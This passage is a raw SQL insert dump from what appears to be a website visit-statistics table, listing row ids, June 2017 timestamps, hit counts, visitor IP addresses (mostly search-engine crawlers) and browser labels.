120261,1497095079,1,0,1,0,'66.249.76.93',''),(120262,1497095802,1,1,0,0,'164.132.162.156','other'),(120263,1497095833,1,1,0,0,'217.182.132.170','other'),(120264,1497096193,1,1,0,0,'66.249.66.157','chrome'),(120265,1497096300,1,1,0,0,'51.255.65.61','other'),(120266,1497096456,1,1,0,0,'217.182.132.17','other'),(120267,1497096603,1,1,0,0,'164.132.161.32','other'),(120268,1497097012,1,1,0,0,'66.249.76.89','chrome'),(120269,1497097662,1,1,0,0,'51.255.65.8','other'),(120270,1497097893,1,1,0,0,'51.255.65.59','other'),(120271,1497097910,1,1,0,0,'164.132.161.64','other'),(120272,1497098069,1,1,0,0,'164.132.161.69','other'),(120273,1497098301,1,1,0,0,'141.8.132.50','other'),(120274,1497098311,1,1,0,0,'141.8.142.97','other'),(120275,1497098328,1,1,0,0,'95.108.179.21','other'),(120276,1497098341,1,1,0,0,'87.250.224.16','other'),(120277,1497098346,1,1,0,0,'178.154.200.64','other'),(120278,1497098664,1,1,0,0,'141.8.183.1','other'),(120279,1497098672,1,1,0,0,'178.154.200.60','other'),(120280,1497098720,1,1,0,0,'66.249.76.89','chrome'),(120281,1497099112,1,1,0,0,'66.249.76.93','chrome'),(120282,1497099419,1,1,0,0,'164.132.161.69','other'),(120283,1497099503,1,1,0,0,'95.108.213.34','other'),(120284,1497099778,1,1,0,0,'66.249.76.109','chrome'),(120285,1497099779,1,1,0,0,'5.255.253.63','other'),(120286,1497100325,1,1,0,0,'216.244.66.237','other'),(120287,1497100458,1,1,0,0,'217.182.132.78','other'),(120288,1497100492,1,1,0,0,'46.165.197.142','other'),(120289,1497100509,1,1,0,0,'5.255.253.58','other'),(120290,1497100750,1,1,0,0,'217.182.132.172','other'),(120291,1497100881,1,1,0,0,'178.154.189.3','other'),(120292,1497101264,1,0,1,0,'66.249.76.109',''),(120293,1497101647,1,1,0,0,'95.108.179.15','other'),(120294,1497102017,1,0,1,0,'66.249.76.93',''),(120295,1497102122,1,0,1,0,'66.249.66.75',''),(120296,1497102127,1,0,1,0,'66.249.66.157',''),(120297,1497102136,1,0,1,0,'66.249.76.89',''),(120298,1497103407,1,1,0,0,'164.132.161.5','other'),(120299,1497103589,1,1,0,0,'66.249.76.89','chrome'),(120300,1497103835,3,3,0,0,'141.8.142.164','other'),(120301,1497103849,1,1,0,0,'217.182.132.59','other'),(120302,1497103875,1,1,0,0,'141.8.142.154','other'),(120303,1497103890,1,1,0,0,'141.8.142.91','other'),(120304,1497103946,1,1,0,0,'178.154.200.37','other'),(120305,1497103962,1,1,0,0,'95.108.179.8','other'),(120306,1497103982,2,2,0,0,'141.8.142.15','other'),(120307,1497104011,1,1,0,0,'87.250.224.18','other'),(120308,1497104015,1,1,0,0,'141.8.132.25','other'),(120309,1497104068,1,1,0,0,'51.255.65.48','other'),(120310,1497104077,2,2,0,0,'95.108.179.15','other'),(120311,1497104131,1,1,0,0,'95.108.181.26','other'),(120312,1497104145,1,1,0,0,'5.255.253.81','other'),(120313,1497104217,1,1,0,0,'178.154.200.60','other'),(120314,1497104239,1,1,0,0,'137.74.207.114','other'),(120315,1497104381,3,3,0,0,'95.108.213.7','other'),(120316,1497104395,1,1,0,0,'180.76.15.157','other'),(120317,1497104504,1,1,0,0,'87.250.224.7','other'),(120318,1497104525,2,2,0,0,'5.255.253.63','other'),(120319,1497104587,1,1,0,0,'8.29.198.26','other'),(120320,1497104925,1,1,0,0,'66.249.66.75','chrome'),(120321,1497105060,2,2,0,0,'66.249.76.89','chrome'),(120322,1497105130,1,1,0,0,'51.255.65.41','other'),(120323,1497105754,1,0,1,0,'66.249.76.91',''),(120324,1497105850,1,1,0,0,'5.255.253.63','other'),(120325,1497105853,1,1,0,0,'178.154.189.3','other'),(120326,1497105932,1,1,0,0,'217.182.132.58','other'),(120327,1497106349,1,0,1,0,'66.249.66.75',''),(120328,1497106526,1,1,0,0,'157.55.39.178','other'),(120329,1497106697,1,1,0,0,'164.132.161.49','other'),(120330,1497107286,1,0,1,0,'66.249.76.89',''),(120331,1497107639,1,1,0,0,'66.102.9.25','chrome'),(120332,1497107852,1,1,0,0,'51.255.65.76','other'),(120333,1497108069,44,44,0,0,'82.193.100.107','other'),(120334,1497108243,1,1,0,0,'164.132.161.59','other'),(120335,1497108626,1,1,0,0,'217.182.132.148','other'),(120336,1497108748,1,1,0,0,'51.255.65.89','other'),(120337,1497109204,1,1,0,0,'164.132.161.43','other'),(120338,1497109507,1,1,0,0,'66.249.66.156','chrome'),(120339,1497109635,1,1,0,0,'91.196.178.38','chrome'),(120340,1497109996,1,1,0,0,'217.182.132.157','other'),(120341,1497109997,1,1,0,0,'51.255.65.25','other'),(120342,1497110877,1,0,1,0,'66.249.76.109',''),(120343,1497111431,1,1,0,0,'66.249.76.108','chrome'),(120344,1497111455,1,1,0,0,'66.249.76.107','chrome'),(120345,1497111514,1,1,0,0,'217.69.133.9','other'),(120346,1497112668,1,1,0,0,'217.182.132.83','other'),(120347,1497113088,1,1,0,0,'66.249.66.157','chrome'),(120348,1497113171,1,1,0,0,'51.255.65.7','other'),(120349,1497113352,1,1,0,0,'217.182.132.23','other'),(120350,1497113587,1,1,0,0,'216.244.66.237','other'),(120351,1497114202,1,1,0,0,'217.182.132.83','other'),(120352,1497114575,1,1,0,0,'164.132.161.66','other'),(120353,1497115086,1,1,0,0,'217.182.132.191','other'),(120354,1497115208,1,1,0,0,'164.132.161.58','other'),(120355,1497115338,1,1,0,0,'51.255.71.133','other'),(120356,1497115420,1,1,0,0,'8.29.198.27','other'),(120357,1497115455,1,1,0,0,'91.196.178.38','chrome'),(120358,1497115687,1,1,0,0,'66.249.76.107','chrome'),(120359,1497116040,1,1,0,0,'217.182.132.18','other'),(120360,1497116826,1,0,1,0,'66.249.66.75',''),(120361,1497117167,1,1,0,0,'164.132.161.57','other'),(120362,1497117300,2,2,0,0,'217.182.132.86','other'),(120363,1497117402,1,1,0,0,'51.255.65.13','other'),(120364,1497119798,1,1,0,0,'185.138.230.138','firefox'),(120365,1497120145,2,1,1,0,'66.249.76.93',''),(120366,1497120312,1,0,1,0,'66.249.66.75',''),(120367,1497120339,1,0,1,0,'66.249.76.89',''),(120368,1497120345,1,0,1,0,'66.249.76.109',''),(120369,1497121781,1,1,0,0,'141.8.142.154','other'),(120370,1497121931,1,1,0,0,'141.8.142.164','other'),(120371,1497121995,1,1,0,0,'95.108.213.34','other'),(120372,1497122082,1,1,0,0,'87.250.224.7','other'),(120373,1497123459,1,1,0,0,'93.158.152.79','other'),(120374,1497124435,1,1,0,0,'207.46.13.112','other'),(120375,1497125118,2,1,1,0,'66.249.76.89',''),(120376,1497126257,1,1,0,0,'8.29.198.25','other'),(120377,1497126451,1,1,0,0,'217.69.143.217','firefox'),(120378,1497126506,1,0,1,0,'68.180.230.48',''),(120379,1497126722,1,1,0,0,'216.244.66.237','other'),(120380,1497127539,1,1,0,0,'178.154.200.45','other'),(120381,1497128658,3,0,3,0,'66.249.76.89',''),(120382,1497130213,1,1,0,0,'66.249.76.93','chrome'),(120383,1497130674,1,1,0,0,'66.249.66.155','chrome'),(120384,1497132302,1,0,1,0,'66.249.66.155',''),(120385,1497133063,1,1,0,0,'5.255.253.83','other'),(120386,1497133745,1,1,0,0,'207.46.13.112','other'),(120387,1497134369,1,1,0,0,'66.249.66.74','chrome'),(120388,1497135340,1,0,1,0,'66.249.76.108',''),(120389,1497135841,1,0,1,0,'66.249.76.93',''),(120390,1497135862,2,0,2,0,'66.249.76.89',''),(120391,1497135988,1,1,0,0,'92.112.189.15','firefox'),(120392,1497136371,2,2,0,0,'216.244.66.237','other'),(120393,1497136435,1,0,1,0,'68.180.230.48',''),(120394,1497137094,1,1,0,0,'8.29.198.25','other'),(120395,1497137170,1,0,1,0,'66.249.66.74',''),(120396,1497137553,2,0,2,0,'66.249.76.91',''),(120397,1497139629,1,1,0,0,'180.76.15.23','other'),(120398,1497142539,2,1,1,0,'66.249.76.108',''),(120399,1497144926,1,0,1,0,'66.249.76.89',''),(120400,1497145490,1,1,0,0,'217.69.133.2','other'),(120401,1497145789,1,1,0,0,'95.132.212.106','chrome'),(120402,1497145791,1,1,0,0,'66.249.66.76','chrome'),(120403,1497145795,1,0,1,0,'66.249.76.93',''),(120404,1497147170,1,1,0,0,'216.244.66.237','other'),(120405,1497147935,1,1,0,0,'8.29.198.26','other'),(120406,1497149160,1,1,0,0,'66.249.76.108','chrome'),(120407,1497149993,1,0,1,0,'66.249.66.74',''),(120408,1497153240,1,0,1,0,'66.249.76.93',''),(120409,1497153258,2,0,2,0,'66.249.66.74',''),(120410,1497153288,1,0,1,0,'66.249.76.107',''),(120411,1497153356,1,1,0,0,'141.8.142.152','other'),(120412,1497154164,1,0,1,0,'68.180.230.48',''),(120413,1497156144,1,0,1,0,'66.249.76.107',''),(120414,1497156961,1,0,1,0,'66.249.66.76',''),(120415,1497157567,1,1,0,0,'217.69.133.9','other'),(120416,1497158769,1,1,0,0,'8.29.198.25','other'),(120417,1497158907,1,0,1,0,'66.249.76.107',''),(120418,1497159378,1,0,1,0,'66.249.76.89',''),(120419,1497159429,1,1,0,0,'141.8.142.134','other'),(120420,1497159554,1,0,1,0,'66.249.66.155',''),(120421,1497160464,1,1,0,0,'193.194.127.217','firefox'),(120422,1497161473,6,6,0,0,'46.4.58.130','other'),(120423,1497161494,1,0,1,0,'66.249.66.74',''),(120424,1497161501,1,0,1,0,'66.249.76.91',''),(120425,1497161619,1,0,1,0,'66.249.76.89',''),(120426,1497163173,1,1,0,0,'46.48.13.161','chrome'),(120427,1497163618,1,0,1,0,'68.180.230.48',''),(120428,1497164311,1,0,1,0,'66.249.76.108',''),(120429,1497165796,1,0,1,0,'66.249.76.109',''),(120430,1497166673,1,0,1,0,'68.180.230.48',''),(120431,1497168247,1,0,1,0,'66.249.76.89',''),(120432,1497168253,1,0,1,0,'66.249.66.157',''),(120433,1497169497,1,1,0,0,'91.196.178.33','chrome'),(120434,1497169606,1,1,0,0,'8.29.198.26','other'),(120435,1497170445,1,0,1,0,'66.249.76.107',''),(120436,1497171582,2,2,0,0,'66.249.76.91','chrome'),(120437,1497171626,1,1,0,0,'66.249.66.76','chrome'),(120438,1497171830,1,1,0,0,'66.249.76.108','chrome'),(120439,1497171872,1,1,0,0,'91.196.178.33','chrome'),(120440,1497172980,1,1,0,0,'216.244.66.237','other'),(120441,1497173219,1,1,0,0,'54.165.59.7','other'),(120442,1497173599,1,0,1,0,'66.249.66.75',''),(120443,1497173637,1,0,1,0,'66.249.76.89',''),(120444,1497173800,1,0,1,0,'66.249.66.156',''),(120445,1497174065,1,1,0,0,'217.69.133.203','other'),(120446,1497174616,1,1,0,0,'217.69.133.2','other'),(120447,1497175057,1,0,1,0,'66.249.76.89',''),(120448,1497175465,1,0,1,0,'66.249.66.155',''),(120449,1497175665,1,0,1,0,'66.249.76.93',''),(120450,1497175678,1,0,1,0,'66.249.76.91',''),(120451,1497176683,1,1,0,0,'95.108.179.14','other'),(120452,1497177250,1,0,1,0,'66.249.66.157',''),(120453,1497178636,1,1,0,0,'180.76.15.27','other'),(120454,1497179922,1,0,1,0,'68.180.230.48',''),(120455,1497180447,1,1,0,0,'8.29.198.26','other'),(120456,1497180767,1,0,1,0,'66.249.76.109',''),(120457,1497182081,1,1,0,0,'87.250.224.19','other'),(120458,1497182484,2,0,2,0,'66.249.76.89',''),(120459,1497182574,1,0,1,0,'66.249.76.109',''),(120460,1497183735,1,1,0,0,'66.249.66.75','chrome'),(120461,1497184679,1,1,0,0,'66.249.76.108','chrome'),(120462,1497188283,1,0,1,0,'68.180.230.48',''),(120463,1497189062,7,7,0,0,'195.154.146.17','other'),(120464,1497189799,1,0,1,0,'66.249.66.76',''),(120465,1497189864,1,0,1,0,'66.249.76.108',''),(120466,1497190210,1,1,0,0,'216.244.66.237','other'),(120467,1497191283,1,1,0,0,'8.29.198.25','other'),(120468,1497191539,1,0,1,0,'66.249.66.157',''),(120469,1497191563,1,0,1,0,'66.249.66.75',''),(120470,1497193682,1,1,0,0,'207.46.13.112','other'),(120471,1497194966,1,1,0,0,'40.77.167.45','other'),(120472,1497195364,1,1,0,0,'216.244.66.237','other'),(120473,1497198480,1,0,1,0,'66.249.76.89',''),(120474,1497198505,1,0,1,0,'66.249.76.108',''),(120475,1497199556,1,0,1,0,'66.249.76.89',''),(120476,1497201669,1,0,1,0,'66.249.76.107',''),(120477,1497201905,1,1,0,0,'216.244.66.237','other'),(120478,1497202118,1,1,0,0,'8.29.198.25','other'),(120479,1497202637,1,0,1,0,'66.249.76.107',''),(120480,1497203565,1,1,0,0,'5.255.253.23','other'),(120481,1497204220,1,1,0,0,'216.244.66.237','other'),(120482,1497204958,1,1,0,0,'40.77.167.45','other'),(120483,1497204970,2,1,1,0,'66.249.66.199',''),(120484,1497205714,1,1,0,0,'5.165.238.212','msie'),(120485,1497206196,1,1,0,0,'66.249.76.108','chrome'),(120486,1497206821,1,1,0,0,'107.21.1.8','other'),(120487,1497207456,1,0,1,0,'66.249.76.107',''),(120488,1497207495,2,0,2,0,'66.249.76.91',''),(120489,1497207591,1,0,1,0,'66.249.76.89',''),(120490,1497207802,1,0,1,0,'68.180.230.48',''),(120491,1497208535,2,2,0,0,'216.244.66.237','other'),(120492,1497209104,1,1,0,0,'180.76.15.10','other'),(120493,1497210590,1,1,0,0,'66.249.76.89','chrome'),(120494,1497210611,1,0,1,0,'66.249.76.91',''),(120495,1497212335,1,1,0,0,'66.249.66.158','chrome'),(120496,1497212862,1,0,1,0,'66.249.66.201',''),(120497,1497212954,1,1,0,0,'8.29.198.26','other'),(120498,1497212966,1,0,1,0,'66.249.76.109',''),(120499,1497213111,1,0,1,0,'66.249.76.89',''),(120500,1497213434,1,0,1,0,'66.249.76.93',''),(120502,1497213973,2,2,0,0,'178.154.200.42','other'),(120503,1497215251,1,1,0,0,'216.244.66.237','other'),(120504,1497215424,1,0,1,0,'66.249.76.89',''),(120505,1497215452,2,0,2,0,'66.249.76.91',''),(120506,1497215519,1,0,1,0,'66.249.66.195',''),(120507,1497217609,1,1,0,0,'216.244.66.237','other'),(120508,1497217653,1,0,1,0,'66.249.76.109',''),(120509,1497217902,1,0,1,0,'66.249.76.108',''),(120510,1497218071,1,0,1,0,'66.249.76.93',''),(120511,1497219214,1,1,0,0,'66.249.76.109','chrome'),(120512,1497220170,1,0,1,0,'66.249.66.201',''),(120513,1497220747,1,0,1,0,'66.249.76.108',''),(120514,1497221666,1,0,1,0,'66.249.76.93',''),(120515,1497221671,2,1,1,0,'66.249.76.89',''),(120516,1497221931,1,0,1,0,'66.249.76.107',''),(120517,1497222322,1,0,1,0,'66.249.66.158',''),(120518,1497223068,1,1,0,0,'157.55.39.178','other'),(120519,1497223531,1,0,1,0,'66.249.66.199',''),(120520,1497223606,1,0,1,0,'66.249.76.108',''),(120521,1497223791,1,1,0,0,'8.29.198.27','other'),(120522,1497224883,1,1,0,0,'216.244.66.237','other'),(120523,1497225223,1,0,1,0,'68.180.230.48',''),(120524,1497225347,1,1,0,0,'66.249.76.108','chrome'),(120525,1497226285,2,2,0,0,'95.213.141.126','opera'),(120526,1497227575,1,1,0,0,'66.249.76.109','chrome'),(120527,1497227839,1,0,1,0,'68.180.230.48',''),(120528,1497227840,1,1,0,0,'66.249.66.157','chrome'),(120529,1497228798,1,0,1,0,'66.249.76.109',''),(120530,1497228845,1,0,1,0,'66.249.66.157',''),(120531,1497228885,1,0,1,0,'68.180.230.48',''),(120532,1497228952,1,0,1,0,'66.249.66.201',''),(120533,1497228958,1,0,1,0,'66.249.76.93',''),(120534,1497231586,1,1,0,0,'217.69.133.9','other'),(120535,1497233676,1,1,0,0,'66.249.76.91','chrome'),(120536,1497234624,1,1,0,0,'8.29.198.25','other'),(120537,1497235218,1,0,1,0,'66.249.76.91',''),(120538,1497235240,1,0,1,0,'66.249.66.201',''),(120539,1497236148,1,1,0,0,'5.196.87.174','other'),(120540,1497236584,1,0,1,0,'66.249.76.91',''),(120541,1497237957,1,0,1,0,'66.249.66.158',''),(120542,1497237983,1,0,1,0,'66.249.66.157',''),(120543,1497238091,1,0,1,0,'66.249.76.107',''),(120544,1497240200,1,1,0,0,'95.221.218.104','msie'),(120545,1497240820,1,1,0,0,'40.77.167.45','other'),(120546,1497242206,1,1,0,0,'91.196.178.65','firefox'),(120547,1497244661,1,1,0,0,'5.255.253.54','other'),(120548,1497244844,2,2,0,0,'91.196.178.169','chrome'),(120549,1497245109,1,1,0,0,'180.76.15.137','other'),(120550,1497245414,1,1,0,0,'91.196.178.68','firefox'),(120551,1497245456,1,1,0,0,'8.29.198.25','other'),(120552,1497245767,1,1,0,0,'91.196.178.68','chrome'),(120553,1497246187,1,1,0,0,'91.196.178.66','chrome'),(120554,1497246262,1,0,1,0,'66.249.76.109',''),(120555,1497246620,4,4,0,0,'46.229.168.68','other'),(120556,1497246635,3,3,0,0,'46.229.168.65','other'),(120557,1497246648,2,2,0,0,'46.229.168.67','other'),(120558,1497246670,3,3,0,0,'46.229.168.74','other'),(120559,1497246696,6,6,0,0,'46.229.168.71','other'),(120560,1497246723,3,3,0,0,'46.229.168.72','other'),(120561,1497246741,2,2,0,0,'46.229.168.73','other'),(120562,1497246753,2,2,0,0,'46.229.168.75','other'),(120563,1497246789,1,1,0,0,'46.229.168.66','other'),(120564,1497246833,2,2,0,0,'46.229.168.70','other'),(120565,1497246901,1,1,0,0,'46.229.168.69','other'),(120566,1497247059,1,1,0,0,'91.196.178.71','chrome'),(120567,1497247112,1,1,0,0,'91.196.178.163','chrome'),(120568,1497247866,1,0,1,0,'66.249.76.91',''),(120569,1497247962,1,0,1,0,'66.249.66.158',''),(120570,1497248118,1,0,1,0,'66.249.76.108',''),(120571,1497248283,1,1,0,0,'66.249.76.89','chrome'),(120572,1497248952,1,1,0,0,'216.244.66.237','other'),(120573,1497249040,1,1,0,0,'185.19.247.55','chrome'),(120574,1497249072,1,1,0,0,'178.95.41.53','other'),(120575,1497249308,1,0,1,0,'66.249.76.91',''),(120576,1497249826,1,0,1,0,'68.180.230.48',''),(120577,1497249865,1,1,0,0,'130.180.217.198','firefox'),(120578,1497250654,1,1,0,0,'91.196.178.71','chrome'),(120579,1497251901,1,1,0,0,'92.112.248.173','chrome'),(120580,1497253629,1,1,0,0,'95.132.15.40','firefox'),(120581,1497254104,1,1,0,0,'5.165.238.212','msie'),(120582,1497255412,1,1,0,0,'91.224.68.236','chrome'),(120583,1497255438,1,1,0,0,'5.255.253.54','other'),(120584,1497255618,1,1,0,0,'91.196.178.135','firefox'),(120585,1497255886,1,1,0,0,'91.196.178.165','chrome'),(120586,1497255983,1,1,0,0,'91.196.178.71','chrome'),(120587,1497256297,1,1,0,0,'8.29.198.26','other'),(120588,1497256670,1,0,1,0,'68.180.230.48',''),(120589,1497256913,1,1,0,0,'141.8.132.47','other'),(120590,1497257460,2,2,0,0,'91.224.68.236','chrome'),(120591,1497257564,1,1,0,0,'95.132.15.40','firefox'),(120592,1497257622,1,1,0,0,'5.196.87.175','other'),(120593,1497257926,1,1,0,0,'5.255.253.54','other'),(120594,1497257931,1,1,0,0,'141.8.132.47','other'),(120595,1497258767,1,1,0,0,'91.196.178.68','chrome'),(120596,1497259184,1,0,1,0,'66.249.76.89',''),(120597,1497260070,1,1,0,0,'91.196.178.163','chrome'),(120598,1497260528,1,1,0,0,'95.134.210.202','firefox'),(120599,1497260609,1,1,0,0,'93.74.212.147','firefox'),(120600,1497261182,1,1,0,0,'91.196.178.135','firefox'),(120601,1497261261,1,0,1,0,'66.249.76.91',''),(120602,1497261271,4,4,0,0,'93.209.12.250','other'),(120603,1497261345,1,0,1,0,'66.249.76.109',''),(120604,1497261449,1,1,0,0,'91.196.178.68','chrome'),(120605,1497261924,1,1,0,0,'91.196.178.97','chrome'),(120606,1497262340,2,2,0,0,'178.151.4.133','chrome'),(120607,1497262873,2,2,0,0,'194.110.126.23','chrome'),(120608,1497263083,1,1,0,0,'5.196.87.174','other'),(120609,1497263186,1,1,0,0,'95.28.168.88','msie'),(120610,1497263242,1,0,1,0,'66.249.76.91',''),(120611,1497263436,1,1,0,0,'216.244.66.237','other'),(120612,1497263736,1,1,0,0,'80.70.73.2','firefox'),(120613,1497264361,2,0,2,0,'68.180.230.48',''),(120614,1497264800,1,1,0,0,'66.249.76.107','chrome'),(120615,1497265333,3,3,0,0,'88.198.66.230','other'),(120616,1497266090,1,1,0,0,'66.102.9.25','chrome'),(120617,1497266494,1,1,0,0,'91.196.178.166','chrome'),(120618,1497266696,1,0,1,0,'66.249.76.109',''),(120619,1497266888,1,1,0,0,'91.196.178.70','chrome'),(120620,1497267130,1,1,0,0,'8.29.198.27','other'),(120621,1497267552,1,1,0,0,'91.196.178.71','chrome'),(120622,1497267845,1,1,0,0,'195.10.210.49','chrome'),(120623,1497267926,1,1,0,0,'66.249.76.93','chrome'),(120624,1497268296,1,1,0,0,'164.132.161.53','other'),(120625,1497268298,1,1,0,0,'217.182.132.51','other'),(120626,1497268726,3,3,0,0,'178.202.133.120','other'),(120627,1497268859,1,1,0,0,'5.196.87.175','other'),(120628,1497269173,1,1,0,0,'51.255.65.58','other'),(120629,1497269180,1,1,0,0,'217.182.132.155','other'),(120630,1497269494,1,1,0,0,'51.255.71.133','other'),(120631,1497269691,1,1,0,0,'51.255.65.69','other'),(120632,1497269811,1,1,0,0,'164.132.161.17','other'),(120633,1497269876,1,1,0,0,'217.182.132.59','other'),(120634,1497269962,1,0,1,0,'66.249.66.158',''),(120635,1497270120,1,1,0,0,'91.196.178.71','chrome'),(120636,1497270204,1,1,0,0,'51.255.65.13','other'),(120637,1497270453,1,1,0,0,'128.69.148.63','opera'),(120638,1497270515,1,1,0,0,'164.132.161.16','other'),(120639,1497270868,1,1,0,0,'217.182.132.186','other'),(120640,1497271779,1,1,0,0,'157.55.39.178','other'),(120641,1497272362,1,0,1,0,'66.249.76.91',''),(120642,1497272363,1,1,0,0,'130.180.210.89','chrome'),(120643,1497272726,1,0,1,0,'66.249.76.109',''),(120644,1497273345,1,1,0,0,'5.196.87.171','other'),(120645,1497273399,1,1,0,0,'125.209.235.173','other'),(120646,1497274189,1,1,0,0,'51.255.65.96','other'),(120647,1497274490,1,1,0,0,'164.132.161.33','other'),(120648,1497274923,1,0,1,0,'68.180.230.48',''),(120649,1497274990,1,1,0,0,'157.55.39.178','other'),(120650,1497275050,1,1,0,0,'164.132.161.48','other'),(120651,1497275583,1,1,0,0,'217.182.132.85','other'),(120652,1497275819,1,1,0,0,'164.132.161.7','other'),(120653,1497275946,1,1,0,0,'5.188.92.2','chrome'),(120654,1497275996,1,1,0,0,'164.132.161.8','other'),(120655,1497276766,1,1,0,0,'137.74.207.108','other'),(120656,1497277196,1,1,0,0,'217.182.132.88','other'),(120657,1497277780,1,1,0,0,'217.182.132.18','other'),(120658,1497277964,1,1,0,0,'8.29.198.25','other'),(120659,1497277984,1,1,0,0,'5.196.87.173','other'),(120660,1497278070,1,1,0,0,'164.132.162.157','other'),(120661,1497278113,1,1,0,0,'51.255.65.58','other'),(120662,1497278287,1,1,0,0,'164.132.161.12','other'),(120663,1497278388,1,1,0,0,'164.132.161.43','other'),(120664,1497278593,1,1,0,0,'217.182.132.25','other'),(120665,1497278727,1,1,0,0,'217.182.132.96','other'),(120666,1497278861,1,1,0,0,'92.113.188.36','chrome'),(120667,1497279120,1,1,0,0,'51.255.65.91','other'),(120668,1497279993,1,1,0,0,'164.132.161.38','other'),(120669,1497280676,1,0,1,0,'66.249.76.93',''),(120670,1497282353,1,1,0,0,'164.132.161.58','other'),(120671,1497282461,1,1,0,0,'217.182.132.79','other'),(120672,1497282558,1,1,0,0,'164.132.161.63','other'),(120673,1497282850,1,0,1,0,'68.180.230.48',''),(120674,1497282954,1,1,0,0,'178.154.200.42','other'),(120675,1497282990,1,1,0,0,'51.255.65.11','other'),(120676,1497283112,1,1,0,0,'217.182.132.179','other'),(120677,1497283560,1,1,0,0,'5.196.87.175','other'),(120678,1497283626,1,1,0,0,'217.182.132.184','other'),(120679,1497283736,1,1,0,0,'51.255.65.67','other'),(120680,1497284769,1,0,1,0,'68.180.230.48',''),(120681,1497285095,1,1,0,0,'164.132.161.34','other'),(120682,1497285221,1,1,0,0,'5.165.238.212','chrome'),(120683,1497285340,1,1,0,0,'107.77.173.3','chrome'),(120684,1497285380,1,1,0,0,'51.255.65.21','other'),(120685,1497285397,1,1,0,0,'37.73.207.38','chrome'),(120686,1497285465,1,1,0,0,'217.182.132.190','other'),(120687,1497285814,1,0,1,0,'66.249.76.108',''),(120688,1497285826,1,1,0,0,'51.255.65.82','other'),(120689,1497286282,1,0,1,0,'66.249.76.89',''),(120690,1497286852,1,1,0,0,'164.132.161.12','other'),(120691,1497286889,1,1,0,0,'217.182.132.155','other'),(120692,1497286927,1,1,0,0,'217.182.132.151','other'),(120693,1497286942,1,0,1,0,'68.180.230.48',''),(120694,1497287196,1,1,0,0,'164.132.161.65','other'),(120695,1497287576,1,1,0,0,'217.182.132.193','other'),(120696,1497287822,1,1,0,0,'51.255.65.23','other'),(120697,1497288134,1,0,1,0,'66.249.76.107',''),(120698,1497288803,1,1,0,0,'8.29.198.26','other'),(120699,1497288815,1,0,1,0,'66.249.76.93',''),(120700,1497288819,1,0,1,0,'68.180.230.48',''),(120701,1497288991,1,1,0,0,'164.132.161.24','other'),(120702,1497289170,1,1,0,0,'51.255.65.75','other'),(120703,1497289200,1,1,0,0,'5.196.87.171','other'),(120704,1497289356,1,1,0,0,'164.132.162.160','other'),(120705,1497289490,1,1,0,0,'51.255.65.26','other'),(120706,1497289673,1,1,0,0,'164.132.161.72','other'),(120707,1497290037,1,1,0,0,'66.249.76.89','chrome'),(120708,1497290056,1,1,0,0,'66.249.76.91','chrome'),(120709,1497290213,1,1,0,0,'66.249.76.107','chrome'),(120710,1497290259,1,1,0,0,'217.182.132.157','other'),(120711,1497290436,1,1,0,0,'51.255.65.36','other'),(120712,1497291296,1,1,0,0,'141.8.142.152','other'),(120713,1497291388,1,1,0,0,'141.8.142.134','other'),(120714,1497291460,1,1,0,0,'217.182.132.171','other'),(120715,1497292313,1,0,1,0,'66.249.76.93',''),(120716,1497292422,1,0,1,0,'66.249.76.89',''),(120717,1497292628,1,1,0,0,'164.132.161.10','other'),(120718,1497293443,1,0,1,0,'66.249.76.93',''),(120719,1497293465,1,0,1,0,'66.249.76.109',''),(120720,1497293730,1,1,0,0,'51.255.65.86','other'),(120721,1497293974,1,1,0,0,'5.196.87.171','other'),(120722,1497294104,1,1,0,0,'91.196.178.163','chrome'),(120723,1497294197,1,1,0,0,'51.255.65.43','other'),(120724,1497294404,1,1,0,0,'164.132.161.24','other'),(120725,1497294685,1,0,1,0,'66.249.66.158',''),(120726,1497295045,1,1,0,0,'164.132.161.92','other'),(120727,1497295183,1,1,0,0,'164.132.161.7','other'),(120728,1497295412,1,1,0,0,'66.249.66.201','chrome'),(120729,1497296065,1,1,0,0,'51.255.65.5','other'),(120730,1497296100,1,1,0,0,'137.74.201.100','other'),(120731,1497296635,1,0,1,0,'66.249.76.89',''),(120732,1497296782,1,1,0,0,'51.255.65.69','other'),(120733,1497296816,1,1,0,0,'51.255.65.8','other'),(120734,1497297077,1,1,0,0,'51.255.71.110','other'),(120735,1497297115,1,1,0,0,'164.132.161.9','other'),(120736,1497297381,1,1,0,0,'164.132.161.75','other'),(120737,1497297736,1,1,0,0,'91.196.178.161','chrome'),(120738,1497297998,1,1,0,0,'51.255.65.29','other'),(120739,1497298115,1,1,0,0,'164.132.161.66','other'),(120740,1497298310,1,1,0,0,'164.132.161.32','other'),(120741,1497298327,1,1,0,0,'164.132.161.8','other'),(120742,1497298371,1,0,1,0,'66.249.76.108',''),(120743,1497298587,1,1,0,0,'5.196.87.171','other'),(120744,1497298710,1,1,0,0,'5.165.238.212','chrome'),(120745,1497298713,1,1,0,0,'51.255.65.57','other'),(120746,1497299644,1,1,0,0,'8.29.198.25','other'),(120747,1497299844,1,1,0,0,'137.74.207.161','other'),(120748,1497300490,1,1,0,0,'164.132.161.8','other'),(120749,1497300720,1,1,0,0,'164.132.161.20','other'),(120750,1497300802,1,1,0,0,'164.132.161.33','other'),(120751,1497300822,1,1,0,0,'164.132.161.15','other'),(120752,1497301039,1,1,0,0,'164.132.161.52','other'),(120753,1497301270,2,0,2,0,'68.180.230.48',''),(120754,1497301753,1,1,0,0,'164.132.162.158','other'),(120755,1497301912,1,1,0,0,'40.77.167.45','other'),(120756,1497301920,1,1,0,0,'164.132.161.56','other'),(120757,1497302132,1,1,0,0,'217.182.132.59','other'),(120758,1497302247,1,1,0,0,'164.132.161.40','other'),(120759,1497302324,1,0,1,0,'66.249.66.158',''),(120760,1497302337,1,1,0,0,'217.182.132.170','other'),(120761,1497302403,1,0,1,0,'66.249.76.109',''),(120762,1497302612,1,1,0,0,'164.132.161.92','other'),(120763,1497302691,1,0,1,0,'66.249.76.108',''),(120764,1497302824,1,1,0,0,'137.74.201.108','other'),(120765,1497303092,1,1,0,0,'5.196.87.172','other'),(120766,1497303497,1,1,0,0,'51.255.71.128','other'),(120767,1497303688,1,1,0,0,'217.182.132.156','other'),(120768,1497303765,1,0,1,0,'68.180.230.48',''),(120769,1497304587,1,1,0,0,'217.69.133.5','other'),(120770,1497304710,1,1,0,0,'180.76.15.151','other'),(120771,1497304962,1,1,0,0,'217.182.132.59','other'),(120772,1497305021,1,1,0,0,'217.182.132.193','other'),(120773,1497305160,1,0,1,0,'66.249.66.156',''),(120774,1497305507,1,1,0,0,'91.209.11.236','other'),(120775,1497305522,1,1,0,0,'164.132.161.87','other'),(120776,1497305643,1,1,0,0,'141.8.142.152','other'),(120777,1497305903,1,1,0,0,'217.182.